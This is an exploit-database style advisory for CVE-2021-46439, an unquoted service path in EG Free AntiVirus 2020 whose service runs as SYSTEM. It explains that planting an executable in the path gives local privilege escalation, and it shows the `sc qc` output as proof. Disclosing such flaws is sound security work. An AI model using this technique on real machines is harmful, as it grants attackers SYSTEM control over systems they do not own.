# Exploit Title: EG Free AntiVirus v2020 - Unquoted Service Path (Local Privilege Escalation) # Date: 24/01/2022 # Exploit Author: Shahrukh Iqbal Mirza (@shahrukhiqbal24) # Vendor Homepage: http://www.egsoftweb.in/index.aspx # Software Link: http://www.egsoftweb.in/OurProduct_Readmore.aspx?id=6 # Version: 2020 # Tested: Windows 10 (x64) # CVE: CVE-2021-46439 ------------- Description: ------------- EG Free AntiVirus (v2020) installs a service (WinSEGAV AutoConfig) with an unquoted service path. Since this service is running as SYSTEM, it creates a local privilege escalation vulnerability. To properly exploit this vulnerability, a local attacker must insert an executable in the path of the service. Rebooting the system or restarting the service will run the malicious executable with elevated privileges. ------------------ Proof of Concept: ------------------ C:\Users\shah>sc qc “WinSEGAV AutoConfig” [SC] QueryServiceConfig SUCCESS SERVICE_NAME: WinSEGAV AutoConfig TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\EGSoftWeb\EG Anti Virus\egavser.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Windows Service For EG Free AntiVirus DEPENDENCIES : SERVICE_START_NAME : LocalSystem Best regards, Shahrukh Iqbal Mirza.